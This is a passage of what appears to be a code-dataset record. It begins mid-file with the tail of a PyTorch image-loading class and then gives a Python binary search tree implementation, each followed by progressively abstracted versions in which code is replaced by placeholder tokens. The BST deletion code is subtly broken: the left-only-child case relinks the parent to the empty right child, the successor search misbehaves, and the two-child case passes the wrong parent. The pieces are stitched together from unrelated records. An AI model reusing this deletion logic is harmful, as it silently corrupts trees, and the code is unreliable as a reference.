else\n 'cpu')\n (self.data_path, self.train_csv, self.val_csv, self.reg, self.\n tr_name, self.val_name, self.test_name, self.extension) = (\n data_path, train_csv, val_csv, reg, tr_name, val_name,\n test_name, extension)\n self.obj = False\n self.multi_label = False\n if setup_data:\n self.set_up_data()\n <function token>\n\n def data_from_paths_to_csv(self, data_path, tr_path, val_path=None,\n test_path=None):\n train_df = csv_from_path(tr_path, tr_path)\n train_df.to_csv(os.path.join(data_path, self.tr_name + '.csv'),\n index=False)\n ret = self.tr_name + '.csv', None\n if val_path is not None:\n val_exists = os.path.exists(val_path)\n if val_exists:\n val_df = csv_from_path(val_path, tr_path)\n val_df.to_csv(os.path.join(data_path, self.val_name +\n '.csv'), index=False)\n ret = self.tr_name + '.csv', self.val_name + '.csv'\n if test_path is not None:\n test_exists = os.path.exists(test_path)\n if test_exists:\n test_df = csv_from_path(test_path, tr_path)\n test_df.to_csv(os.path.join(data_path, self.test_name +\n '.csv'), index=False)\n ret = (self.tr_name + '.csv', 
self.val_name + '.csv', self.\n test_name + '.csv')\n return ret\n\n def get_data(self, data_dict=None, s=(224, 224), dataset=\n my_image_csv_dataset, bs=32, balance=False, tfms=None, bal_tfms=\n None, tta=False, num_workers=4, stats_percentage=0.6):\n self.image_size = s\n if not data_dict:\n data_dict = self.data_dict\n data_dfs, data_dir, minorities, class_diffs, obj, multi_label = (\n data_dict['data_dfs'], data_dict['data_dir'], data_dict[\n 'minorities'], data_dict['class_diffs'], data_dict['obj'],\n data_dict['multi_label'])\n if obj or multi_label:\n balance = False\n if tta:\n tta_tfms = {self.tr_name: transforms.Compose([transforms.\n FiveCrop(s[0]), transforms.Lambda(lambda crops: torch.stack\n ([transforms.ToTensor()(crop) for crop in crops])),\n transforms.Lambda(lambda crops: torch.stack([transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])(\n crop) for crop in crops]))]), self.val_name: transforms.\n Compose([transforms.FiveCrop(s[0]), transforms.Lambda(lambda\n crops: torch.stack([transforms.ToTensor()(crop) for crop in\n crops])), transforms.Lambda(lambda crops: torch.stack([\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, \n 0.225])(crop) for crop in crops]))]), self.test_name:\n transforms.Compose([transforms.FiveCrop(s[0]), transforms.\n Lambda(lambda crops: torch.stack([transforms.ToTensor()(\n crop) for crop in crops])), transforms.Lambda(lambda crops:\n torch.stack([transforms.Normalize([0.485, 0.456, 0.406], [\n 0.229, 0.224, 0.225])(crop) for crop in crops]))])}\n else:\n tta_tfms = None\n if not bal_tfms:\n bal_tfms = {self.tr_name: [transforms.RandomHorizontalFlip()],\n self.val_name: None, self.test_name: None}\n else:\n bal_tfms = {self.tr_name: bal_tfms, self.val_name: None, self.\n test_name: None}\n if obj:\n resize_transform = transforms.Resize(s)\n else:\n resize_transform = transforms.Resize(s)\n if not tfms:\n tfms = [resize_transform, transforms.ToTensor(), transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]\n else:\n tfms_temp = [resize_transform, transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, \n 0.225])]\n tfms_temp[1:1] = tfms\n tfms = tfms_temp\n print(tfms)\n data_transforms = {self.tr_name: tfms, self.val_name: [transforms.\n Resize(s), transforms.ToTensor(), transforms.Normalize([0.485, \n 0.456, 0.406], [0.229, 0.224, 0.225])], self.test_name: [\n transforms.Resize(s), transforms.ToTensor(), transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]}\n temp_tfms = [resize_transform, transforms.ToTensor()]\n temp_dataset = dataset(os.path.join(data_dir, self.tr_name),\n data_dfs[self.tr_name], temp_tfms)\n self.img_mean, self.img_std = get_img_stats(temp_dataset,\n stats_percentage)\n data_transforms[self.tr_name][-1].mean, data_transforms[self.tr_name][\n -1].std = self.img_mean, self.img_std\n data_transforms[self.val_name][-1].mean, data_transforms[self.val_name\n ][-1].std = self.img_mean, self.img_std\n data_transforms[self.test_name][-1].mean, data_transforms[self.\n test_name][-1].std = self.img_mean, self.img_std\n if balance:\n image_datasets = {x: dataset(os.path.join(data_dir, self.\n tr_name), data_dfs[x], data_transforms[x], obj, minorities,\n class_diffs, bal_tfms[x]) for x in [self.tr_name, self.\n val_name, self.test_name]}\n else:\n image_datasets = {x: dataset(os.path.join(data_dir, self.\n tr_name), data_dfs[x], data_transforms[x], obj) for x in [\n self.tr_name, self.val_name, self.test_name]}\n dataloaders = {x: 
torch.utils.data.DataLoader(image_datasets[x],\n batch_size=bs, shuffle=True, num_workers=num_workers) for x in\n [self.tr_name, self.val_name, self.test_name]}\n dataset_sizes = {x: len(image_datasets[x]) for x in [self.tr_name,\n self.val_name, self.test_name]}\n self.image_datasets, self.dataloaders, self.dataset_sizes = (\n image_datasets, dataloaders, dataset_sizes)\n return image_datasets, dataloaders, dataset_sizes\n <function token>\n\n def denorm_img(self, inp, calculate=False):\n inp = inp.numpy().transpose((1, 2, 0))\n if calculate:\n mean = np.mean(inp)\n std = np.std(inp)\n else:\n mean = self.img_mean.numpy()\n std = self.img_std.numpy()\n inp = std * inp + mean\n inp = np.clip(inp, 0, 1)\n return inp\n\n def show_data(self, folder_name='train', size=(64, 64), bs=5):\n self.get_data(size, bs)\n batch = next(iter(self.dataloaders[folder_name]))\n inputs, classes = batch[0], batch[1]\n out = torchvision.utils.make_grid(inputs)\n if self.reg:\n print(classes)\n self.imshow(out, title=[x for x in classes])\n elif self.multi_label:\n self.imshow(out, title=[self.class_names[np.nonzero(x.type(\n torch.LongTensor))] for x in classes])\n else:\n self.imshow(out, title=[self.class_names[x] for x in classes])\n", "<import token>\n<class token>\n<class token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\nclass DataProcessor:\n\n def __init__(self, data_path=None, train_csv=None, val_csv=None, reg=\n False, tr_name='train', val_name='val', test_name='test', extension\n =None, setup_data=True):\n print('+------------------------------------+')\n print('| Dream AI |')\n print('+------------------------------------+')\n print()\n self.device = torch.device('cuda:0' if torch.cuda.is_available() else\n 'cpu')\n (self.data_path, self.train_csv, self.val_csv, self.reg, self.\n tr_name, self.val_name, self.test_name, self.extension) = (\n data_path, train_csv, val_csv, reg, tr_name, val_name,\n test_name, extension)\n self.obj = False\n self.multi_label = False\n if setup_data:\n self.set_up_data()\n <function token>\n\n def data_from_paths_to_csv(self, data_path, tr_path, val_path=None,\n test_path=None):\n train_df = csv_from_path(tr_path, tr_path)\n train_df.to_csv(os.path.join(data_path, self.tr_name + '.csv'),\n index=False)\n ret = self.tr_name + '.csv', None\n if val_path is not None:\n val_exists = os.path.exists(val_path)\n if val_exists:\n val_df = csv_from_path(val_path, tr_path)\n val_df.to_csv(os.path.join(data_path, self.val_name +\n '.csv'), index=False)\n ret = self.tr_name + '.csv', self.val_name + '.csv'\n if test_path is not None:\n test_exists = os.path.exists(test_path)\n if test_exists:\n test_df = csv_from_path(test_path, tr_path)\n test_df.to_csv(os.path.join(data_path, self.test_name +\n '.csv'), index=False)\n ret = (self.tr_name + '.csv', self.val_name + '.csv', self.\n test_name + '.csv')\n return ret\n\n def get_data(self, data_dict=None, s=(224, 224), dataset=\n my_image_csv_dataset, bs=32, balance=False, tfms=None, bal_tfms=\n None, tta=False, num_workers=4, stats_percentage=0.6):\n self.image_size = s\n if not data_dict:\n data_dict = self.data_dict\n data_dfs, data_dir, minorities, class_diffs, obj, multi_label = (\n data_dict['data_dfs'], data_dict['data_dir'], data_dict[\n 'minorities'], data_dict['class_diffs'], data_dict['obj'],\n data_dict['multi_label'])\n if obj or multi_label:\n 
balance = False\n if tta:\n tta_tfms = {self.tr_name: transforms.Compose([transforms.\n FiveCrop(s[0]), transforms.Lambda(lambda crops: torch.stack\n ([transforms.ToTensor()(crop) for crop in crops])),\n transforms.Lambda(lambda crops: torch.stack([transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])(\n crop) for crop in crops]))]), self.val_name: transforms.\n Compose([transforms.FiveCrop(s[0]), transforms.Lambda(lambda\n crops: torch.stack([transforms.ToTensor()(crop) for crop in\n crops])), transforms.Lambda(lambda crops: torch.stack([\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, \n 0.225])(crop) for crop in crops]))]), self.test_name:\n transforms.Compose([transforms.FiveCrop(s[0]), transforms.\n Lambda(lambda crops: torch.stack([transforms.ToTensor()(\n crop) for crop in crops])), transforms.Lambda(lambda crops:\n torch.stack([transforms.Normalize([0.485, 0.456, 0.406], [\n 0.229, 0.224, 0.225])(crop) for crop in crops]))])}\n else:\n tta_tfms = None\n if not bal_tfms:\n bal_tfms = {self.tr_name: [transforms.RandomHorizontalFlip()],\n self.val_name: None, self.test_name: None}\n else:\n bal_tfms = {self.tr_name: bal_tfms, self.val_name: None, self.\n test_name: None}\n if obj:\n resize_transform = transforms.Resize(s)\n else:\n resize_transform = transforms.Resize(s)\n if not tfms:\n tfms = [resize_transform, transforms.ToTensor(), transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]\n else:\n tfms_temp = [resize_transform, transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, \n 0.225])]\n tfms_temp[1:1] = tfms\n tfms = tfms_temp\n print(tfms)\n data_transforms = {self.tr_name: tfms, self.val_name: [transforms.\n Resize(s), transforms.ToTensor(), transforms.Normalize([0.485, \n 0.456, 0.406], [0.229, 0.224, 0.225])], self.test_name: [\n transforms.Resize(s), transforms.ToTensor(), transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]}\n temp_tfms = [resize_transform, transforms.ToTensor()]\n temp_dataset = dataset(os.path.join(data_dir, self.tr_name),\n data_dfs[self.tr_name], temp_tfms)\n self.img_mean, self.img_std = get_img_stats(temp_dataset,\n stats_percentage)\n data_transforms[self.tr_name][-1].mean, data_transforms[self.tr_name][\n -1].std = self.img_mean, self.img_std\n data_transforms[self.val_name][-1].mean, data_transforms[self.val_name\n ][-1].std = self.img_mean, self.img_std\n data_transforms[self.test_name][-1].mean, data_transforms[self.\n test_name][-1].std = self.img_mean, self.img_std\n if balance:\n image_datasets = {x: dataset(os.path.join(data_dir, self.\n tr_name), data_dfs[x], data_transforms[x], obj, minorities,\n class_diffs, bal_tfms[x]) for x in [self.tr_name, self.\n val_name, self.test_name]}\n else:\n image_datasets = {x: dataset(os.path.join(data_dir, self.\n tr_name), data_dfs[x], data_transforms[x], obj) for x in [\n self.tr_name, self.val_name, self.test_name]}\n dataloaders = {x: torch.utils.data.DataLoader(image_datasets[x],\n batch_size=bs, shuffle=True, num_workers=num_workers) for x in\n [self.tr_name, self.val_name, self.test_name]}\n dataset_sizes = {x: len(image_datasets[x]) for x in [self.tr_name,\n self.val_name, self.test_name]}\n self.image_datasets, self.dataloaders, self.dataset_sizes = (\n image_datasets, dataloaders, dataset_sizes)\n return image_datasets, dataloaders, dataset_sizes\n <function token>\n <function token>\n\n def show_data(self, folder_name='train', size=(64, 64), bs=5):\n self.get_data(size, bs)\n batch = 
next(iter(self.dataloaders[folder_name]))\n inputs, classes = batch[0], batch[1]\n out = torchvision.utils.make_grid(inputs)\n if self.reg:\n print(classes)\n self.imshow(out, title=[x for x in classes])\n elif self.multi_label:\n self.imshow(out, title=[self.class_names[np.nonzero(x.type(\n torch.LongTensor))] for x in classes])\n else:\n self.imshow(out, title=[self.class_names[x] for x in classes])\n", "<import token>\n<class token>\n<class token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\nclass DataProcessor:\n\n def __init__(self, data_path=None, train_csv=None, val_csv=None, reg=\n False, tr_name='train', val_name='val', test_name='test', extension\n =None, setup_data=True):\n print('+------------------------------------+')\n print('| Dream AI |')\n print('+------------------------------------+')\n print()\n self.device = torch.device('cuda:0' if torch.cuda.is_available() else\n 'cpu')\n (self.data_path, self.train_csv, self.val_csv, self.reg, self.\n tr_name, self.val_name, self.test_name, self.extension) = (\n data_path, train_csv, val_csv, reg, tr_name, val_name,\n test_name, extension)\n self.obj = False\n self.multi_label = False\n if setup_data:\n self.set_up_data()\n <function token>\n\n def data_from_paths_to_csv(self, data_path, tr_path, val_path=None,\n test_path=None):\n train_df = csv_from_path(tr_path, tr_path)\n train_df.to_csv(os.path.join(data_path, self.tr_name + '.csv'),\n index=False)\n ret = self.tr_name + '.csv', None\n if val_path is not None:\n val_exists = os.path.exists(val_path)\n if val_exists:\n val_df = csv_from_path(val_path, tr_path)\n val_df.to_csv(os.path.join(data_path, self.val_name +\n '.csv'), index=False)\n ret = self.tr_name + '.csv', self.val_name + '.csv'\n if test_path is not None:\n test_exists = os.path.exists(test_path)\n if test_exists:\n test_df = csv_from_path(test_path, tr_path)\n test_df.to_csv(os.path.join(data_path, self.test_name +\n '.csv'), index=False)\n ret = (self.tr_name + '.csv', self.val_name + '.csv', self.\n test_name + '.csv')\n return ret\n <function token>\n <function token>\n <function token>\n\n def show_data(self, folder_name='train', size=(64, 64), bs=5):\n self.get_data(size, bs)\n batch = next(iter(self.dataloaders[folder_name]))\n inputs, classes = batch[0], batch[1]\n out = torchvision.utils.make_grid(inputs)\n if self.reg:\n print(classes)\n self.imshow(out, title=[x for x in classes])\n elif self.multi_label:\n self.imshow(out, title=[self.class_names[np.nonzero(x.type(\n torch.LongTensor))] for x in classes])\n else:\n self.imshow(out, title=[self.class_names[x] for x in classes])\n", "<import token>\n<class token>\n<class token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\nclass DataProcessor:\n\n def __init__(self, data_path=None, train_csv=None, val_csv=None, reg=\n False, tr_name='train', val_name='val', test_name='test', extension\n =None, setup_data=True):\n print('+------------------------------------+')\n print('| Dream AI |')\n print('+------------------------------------+')\n print()\n self.device = torch.device('cuda:0' if torch.cuda.is_available() else\n 'cpu')\n (self.data_path, self.train_csv, self.val_csv, self.reg, self.\n tr_name, 
self.val_name, self.test_name, self.extension) = (\n data_path, train_csv, val_csv, reg, tr_name, val_name,\n test_name, extension)\n self.obj = False\n self.multi_label = False\n if setup_data:\n self.set_up_data()\n <function token>\n\n def data_from_paths_to_csv(self, data_path, tr_path, val_path=None,\n test_path=None):\n train_df = csv_from_path(tr_path, tr_path)\n train_df.to_csv(os.path.join(data_path, self.tr_name + '.csv'),\n index=False)\n ret = self.tr_name + '.csv', None\n if val_path is not None:\n val_exists = os.path.exists(val_path)\n if val_exists:\n val_df = csv_from_path(val_path, tr_path)\n val_df.to_csv(os.path.join(data_path, self.val_name +\n '.csv'), index=False)\n ret = self.tr_name + '.csv', self.val_name + '.csv'\n if test_path is not None:\n test_exists = os.path.exists(test_path)\n if test_exists:\n test_df = csv_from_path(test_path, tr_path)\n test_df.to_csv(os.path.join(data_path, self.test_name +\n '.csv'), index=False)\n ret = (self.tr_name + '.csv', self.val_name + '.csv', self.\n test_name + '.csv')\n return ret\n <function token>\n <function token>\n <function token>\n <function token>\n", "<import token>\n<class token>\n<class token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\nclass DataProcessor:\n\n def __init__(self, data_path=None, train_csv=None, val_csv=None, reg=\n False, tr_name='train', val_name='val', test_name='test', extension\n =None, setup_data=True):\n print('+------------------------------------+')\n print('| Dream AI |')\n print('+------------------------------------+')\n print()\n self.device = torch.device('cuda:0' if torch.cuda.is_available() else\n 'cpu')\n (self.data_path, self.train_csv, self.val_csv, self.reg, self.\n tr_name, self.val_name, self.test_name, self.extension) = (\n data_path, train_csv, val_csv, reg, tr_name, val_name,\n test_name, extension)\n self.obj = False\n self.multi_label = False\n if setup_data:\n self.set_up_data()\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n", "<import token>\n<class token>\n<class token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\nclass DataProcessor:\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n", "<import token>\n<class token>\n<class token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<class token>\n" ]
false
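The record above patches freshly computed per-channel statistics into each split's transforms.Normalize (via get_img_stats over a stats_percentage sample of the training data). A minimal sketch of that estimation step, assuming a dataset yielding (image, label) pairs of 3-channel float tensors; estimate_mean_std, sample_fraction, and batch_size are illustrative names, not part of the record:

```python
import torch
from torch.utils.data import DataLoader

def estimate_mean_std(dataset, sample_fraction=0.6, batch_size=32):
    # Accumulate per-channel sums over a random subset of the dataset,
    # mirroring the stats_percentage idea in the record above.
    n = max(1, int(len(dataset) * sample_fraction))
    subset, _ = torch.utils.data.random_split(dataset, [n, len(dataset) - n])
    loader = DataLoader(subset, batch_size=batch_size)
    total, sq_total, count = torch.zeros(3), torch.zeros(3), 0
    for images, _ in loader:
        # images: (B, 3, H, W); reduce over batch and spatial dims
        b, c, h, w = images.shape
        total += images.sum(dim=(0, 2, 3))
        sq_total += (images ** 2).sum(dim=(0, 2, 3))
        count += b * h * w
    mean = total / count
    # var = E[x^2] - E[x]^2; clamp guards against tiny negative float error
    std = (sq_total / count - mean ** 2).clamp(min=0).sqrt()
    return mean, std
```

Sampling only a fraction trades a small bias in the estimate for a much cheaper pass over the images, which is presumably why the record exposes stats_percentage as a knob.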
81
64c32b3ada7fff51a7c4b07872b7688e100897d8
class Node(object):
    def __init__(self, data):
        self.data = data
        self.left = None
        self.right = None
        self.parent = None

class tree(object):
    def __init__(self):
        self.root = None

    def insert(self, root, value):
        # Insert value into the subtree rooted at root; duplicates are ignored.
        if self.root is None:
            self.root = Node(value)
        else:
            if value < root.data:
                if root.left is None:
                    root.left = Node(value)
                else:
                    self.insert(root.left, value)
            elif value > root.data:
                if root.right is None:
                    root.right = Node(value)
                else:
                    self.insert(root.right, value)
        return root

    def delete(self, root, data, parent):
        # Delete data from the subtree rooted at root and return the
        # (possibly new) root of that subtree.
        if root is None:
            return root
        if root.data < data:
            parent = root
            root.right = self.delete(root.right, data, parent)
        elif root.data > data:
            parent = root
            root.left = self.delete(root.left, data, parent)
        else:
            if root.left is None and root.right is None:
                # Leaf node: detach it from its parent.
                if data > parent.data:
                    parent.right = None
                else:
                    parent.left = None
                root = None
            elif root.left is None:
                # Only a right child: splice it into the parent's slot.
                if data > parent.data:
                    parent.right = root.right
                else:
                    parent.left = root.right
                root = root.right
            elif root.right is None:
                # Only a left child: splice it into the parent's slot.
                if data > parent.data:
                    parent.right = root.left
                else:
                    parent.left = root.left
                root = root.left
            else:
                # Two children: copy the in-order successor's value, then
                # delete that value from the right subtree (whose parent is
                # this node, not the caller's parent).
                temp = self.successor(root.right)
                root.data = temp.data
                root.right = self.delete(root.right, temp.data, root)
        return root

    def successor(self, root):
        # Leftmost node of the given subtree, i.e. its minimum.
        temp = root
        while temp.left:
            temp = temp.left
        return temp

    def inorder(self, root):
        if root is not None:
            self.inorder(root.left)
            print(root.data)
            self.inorder(root.right)

def main():
    Tree = tree()
    l = [50, 30, 20, 40, 70, 60, 80]
    for item in l:
        Tree.insert(Tree.root, item)
    Tree.delete(Tree.root, 20, None)
    print("inorder after deleting 20:")
    Tree.inorder(Tree.root)
    Tree.delete(Tree.root, 30, None)
    Tree.delete(Tree.root, 50, None)
    print("inorder after deleting 30 and 50:")
    Tree.inorder(Tree.root)

main()
[ "class Node(object):\n def __init__(self,data):\n self.data = data\n self.left = None\n self.right = None\n self.parent = None\n\nclass tree(object):\n def __init__(self):\n self.root = None\n \n def insert(self,root,value):\n if self.root == None:\n self.root = Node(value)\n else:\n if value < root.data:\n if root.left is None:\n root.left = Node(value)\n else:\n self.insert(root.left,value)\n elif value > root.data:\n if root.right is None:\n root.right = Node(value)\n else:\n self.insert(root.right,value)\n return root \n def delete(self,root,data,parent):\n if root is None:\n return root\n if root.data < data:\n parent = root\n root.right = self.delete(root.right,data,parent)\n elif root.data > data :\n parent = root\n root.left = self.delete(root.left,data,parent)\n else:\n if root is None or root.data != data:\n return False\n elif root.left is None and root.right is None:\n if data > parent.data:\n parent.right = None\n root = None\n else:\n parent.left = None\n root = None\n elif root.left is None:\n if data > parent.data:\n parent.right = root.right\n root = parent.right\n else:\n parent.left = root.right\n root = parent.left\n \n elif root.right is None:\n if data > parent.data:\n parent.right = root.right\n root = parent.right\n else:\n parent.left = root.right\n root = parent.right\n else:\n temp = self.successor(root.right)\n root.data = temp.data\n root.right = self.delete(root.right,temp.data,parent)\n \n return root\n \n def successor(self,root):\n temp = root\n if root.right:\n while temp.left:\n temp = temp.left\n return temp\n def inorder(self,root):\n if root is not None:\n self.inorder(root.left)\n print(root.data)\n self.inorder(root.right)\n \ndef main():\n Tree = tree()\n l =[50,30,20,40,70,60,80]\n for item in l:\n Tree.insert(Tree.root,item)\n print(Tree.delete(Tree.root,20,None))\n print(\"inorder after deleting 20:\")\n print(Tree.inorder(Tree.root))\n print(Tree.delete(Tree.root,30,None))\n print(Tree.delete(Tree.root,50,None))\n print(Tree.inorder(Tree.root))\n \nmain()\n \n \n \n \n \n \n", "class Node(object):\n\n def __init__(self, data):\n self.data = data\n self.left = None\n self.right = None\n self.parent = None\n\n\nclass tree(object):\n\n def __init__(self):\n self.root = None\n\n def insert(self, root, value):\n if self.root == None:\n self.root = Node(value)\n elif value < root.data:\n if root.left is None:\n root.left = Node(value)\n else:\n self.insert(root.left, value)\n elif value > root.data:\n if root.right is None:\n root.right = Node(value)\n else:\n self.insert(root.right, value)\n return root\n\n def delete(self, root, data, parent):\n if root is None:\n return root\n if root.data < data:\n parent = root\n root.right = self.delete(root.right, data, parent)\n elif root.data > data:\n parent = root\n root.left = self.delete(root.left, data, parent)\n elif root is None or root.data != data:\n return False\n elif root.left is None and root.right is None:\n if data > parent.data:\n parent.right = None\n root = None\n else:\n parent.left = None\n root = None\n elif root.left is None:\n if data > parent.data:\n parent.right = root.right\n root = parent.right\n else:\n parent.left = root.right\n root = parent.left\n elif root.right is None:\n if data > parent.data:\n parent.right = root.right\n root = parent.right\n else:\n parent.left = root.right\n root = parent.right\n else:\n temp = self.successor(root.right)\n root.data = temp.data\n root.right = self.delete(root.right, temp.data, parent)\n return root\n\n def successor(self, root):\n temp 
= root\n if root.right:\n while temp.left:\n temp = temp.left\n return temp\n\n def inorder(self, root):\n if root is not None:\n self.inorder(root.left)\n print(root.data)\n self.inorder(root.right)\n\n\ndef main():\n Tree = tree()\n l = [50, 30, 20, 40, 70, 60, 80]\n for item in l:\n Tree.insert(Tree.root, item)\n print(Tree.delete(Tree.root, 20, None))\n print('inorder after deleting 20:')\n print(Tree.inorder(Tree.root))\n print(Tree.delete(Tree.root, 30, None))\n print(Tree.delete(Tree.root, 50, None))\n print(Tree.inorder(Tree.root))\n\n\nmain()\n", "class Node(object):\n\n def __init__(self, data):\n self.data = data\n self.left = None\n self.right = None\n self.parent = None\n\n\nclass tree(object):\n\n def __init__(self):\n self.root = None\n\n def insert(self, root, value):\n if self.root == None:\n self.root = Node(value)\n elif value < root.data:\n if root.left is None:\n root.left = Node(value)\n else:\n self.insert(root.left, value)\n elif value > root.data:\n if root.right is None:\n root.right = Node(value)\n else:\n self.insert(root.right, value)\n return root\n\n def delete(self, root, data, parent):\n if root is None:\n return root\n if root.data < data:\n parent = root\n root.right = self.delete(root.right, data, parent)\n elif root.data > data:\n parent = root\n root.left = self.delete(root.left, data, parent)\n elif root is None or root.data != data:\n return False\n elif root.left is None and root.right is None:\n if data > parent.data:\n parent.right = None\n root = None\n else:\n parent.left = None\n root = None\n elif root.left is None:\n if data > parent.data:\n parent.right = root.right\n root = parent.right\n else:\n parent.left = root.right\n root = parent.left\n elif root.right is None:\n if data > parent.data:\n parent.right = root.right\n root = parent.right\n else:\n parent.left = root.right\n root = parent.right\n else:\n temp = self.successor(root.right)\n root.data = temp.data\n root.right = self.delete(root.right, temp.data, parent)\n return root\n\n def successor(self, root):\n temp = root\n if root.right:\n while temp.left:\n temp = temp.left\n return temp\n\n def inorder(self, root):\n if root is not None:\n self.inorder(root.left)\n print(root.data)\n self.inorder(root.right)\n\n\ndef main():\n Tree = tree()\n l = [50, 30, 20, 40, 70, 60, 80]\n for item in l:\n Tree.insert(Tree.root, item)\n print(Tree.delete(Tree.root, 20, None))\n print('inorder after deleting 20:')\n print(Tree.inorder(Tree.root))\n print(Tree.delete(Tree.root, 30, None))\n print(Tree.delete(Tree.root, 50, None))\n print(Tree.inorder(Tree.root))\n\n\n<code token>\n", "class Node(object):\n\n def __init__(self, data):\n self.data = data\n self.left = None\n self.right = None\n self.parent = None\n\n\nclass tree(object):\n\n def __init__(self):\n self.root = None\n\n def insert(self, root, value):\n if self.root == None:\n self.root = Node(value)\n elif value < root.data:\n if root.left is None:\n root.left = Node(value)\n else:\n self.insert(root.left, value)\n elif value > root.data:\n if root.right is None:\n root.right = Node(value)\n else:\n self.insert(root.right, value)\n return root\n\n def delete(self, root, data, parent):\n if root is None:\n return root\n if root.data < data:\n parent = root\n root.right = self.delete(root.right, data, parent)\n elif root.data > data:\n parent = root\n root.left = self.delete(root.left, data, parent)\n elif root is None or root.data != data:\n return False\n elif root.left is None and root.right is None:\n if data > parent.data:\n 
parent.right = None\n root = None\n else:\n parent.left = None\n root = None\n elif root.left is None:\n if data > parent.data:\n parent.right = root.right\n root = parent.right\n else:\n parent.left = root.right\n root = parent.left\n elif root.right is None:\n if data > parent.data:\n parent.right = root.right\n root = parent.right\n else:\n parent.left = root.right\n root = parent.right\n else:\n temp = self.successor(root.right)\n root.data = temp.data\n root.right = self.delete(root.right, temp.data, parent)\n return root\n\n def successor(self, root):\n temp = root\n if root.right:\n while temp.left:\n temp = temp.left\n return temp\n\n def inorder(self, root):\n if root is not None:\n self.inorder(root.left)\n print(root.data)\n self.inorder(root.right)\n\n\n<function token>\n<code token>\n", "class Node(object):\n <function token>\n\n\nclass tree(object):\n\n def __init__(self):\n self.root = None\n\n def insert(self, root, value):\n if self.root == None:\n self.root = Node(value)\n elif value < root.data:\n if root.left is None:\n root.left = Node(value)\n else:\n self.insert(root.left, value)\n elif value > root.data:\n if root.right is None:\n root.right = Node(value)\n else:\n self.insert(root.right, value)\n return root\n\n def delete(self, root, data, parent):\n if root is None:\n return root\n if root.data < data:\n parent = root\n root.right = self.delete(root.right, data, parent)\n elif root.data > data:\n parent = root\n root.left = self.delete(root.left, data, parent)\n elif root is None or root.data != data:\n return False\n elif root.left is None and root.right is None:\n if data > parent.data:\n parent.right = None\n root = None\n else:\n parent.left = None\n root = None\n elif root.left is None:\n if data > parent.data:\n parent.right = root.right\n root = parent.right\n else:\n parent.left = root.right\n root = parent.left\n elif root.right is None:\n if data > parent.data:\n parent.right = root.right\n root = parent.right\n else:\n parent.left = root.right\n root = parent.right\n else:\n temp = self.successor(root.right)\n root.data = temp.data\n root.right = self.delete(root.right, temp.data, parent)\n return root\n\n def successor(self, root):\n temp = root\n if root.right:\n while temp.left:\n temp = temp.left\n return temp\n\n def inorder(self, root):\n if root is not None:\n self.inorder(root.left)\n print(root.data)\n self.inorder(root.right)\n\n\n<function token>\n<code token>\n", "<class token>\n\n\nclass tree(object):\n\n def __init__(self):\n self.root = None\n\n def insert(self, root, value):\n if self.root == None:\n self.root = Node(value)\n elif value < root.data:\n if root.left is None:\n root.left = Node(value)\n else:\n self.insert(root.left, value)\n elif value > root.data:\n if root.right is None:\n root.right = Node(value)\n else:\n self.insert(root.right, value)\n return root\n\n def delete(self, root, data, parent):\n if root is None:\n return root\n if root.data < data:\n parent = root\n root.right = self.delete(root.right, data, parent)\n elif root.data > data:\n parent = root\n root.left = self.delete(root.left, data, parent)\n elif root is None or root.data != data:\n return False\n elif root.left is None and root.right is None:\n if data > parent.data:\n parent.right = None\n root = None\n else:\n parent.left = None\n root = None\n elif root.left is None:\n if data > parent.data:\n parent.right = root.right\n root = parent.right\n else:\n parent.left = root.right\n root = parent.left\n elif root.right is None:\n if data > parent.data:\n 
parent.right = root.right\n root = parent.right\n else:\n parent.left = root.right\n root = parent.right\n else:\n temp = self.successor(root.right)\n root.data = temp.data\n root.right = self.delete(root.right, temp.data, parent)\n return root\n\n def successor(self, root):\n temp = root\n if root.right:\n while temp.left:\n temp = temp.left\n return temp\n\n def inorder(self, root):\n if root is not None:\n self.inorder(root.left)\n print(root.data)\n self.inorder(root.right)\n\n\n<function token>\n<code token>\n", "<class token>\n\n\nclass tree(object):\n\n def __init__(self):\n self.root = None\n\n def insert(self, root, value):\n if self.root == None:\n self.root = Node(value)\n elif value < root.data:\n if root.left is None:\n root.left = Node(value)\n else:\n self.insert(root.left, value)\n elif value > root.data:\n if root.right is None:\n root.right = Node(value)\n else:\n self.insert(root.right, value)\n return root\n\n def delete(self, root, data, parent):\n if root is None:\n return root\n if root.data < data:\n parent = root\n root.right = self.delete(root.right, data, parent)\n elif root.data > data:\n parent = root\n root.left = self.delete(root.left, data, parent)\n elif root is None or root.data != data:\n return False\n elif root.left is None and root.right is None:\n if data > parent.data:\n parent.right = None\n root = None\n else:\n parent.left = None\n root = None\n elif root.left is None:\n if data > parent.data:\n parent.right = root.right\n root = parent.right\n else:\n parent.left = root.right\n root = parent.left\n elif root.right is None:\n if data > parent.data:\n parent.right = root.right\n root = parent.right\n else:\n parent.left = root.right\n root = parent.right\n else:\n temp = self.successor(root.right)\n root.data = temp.data\n root.right = self.delete(root.right, 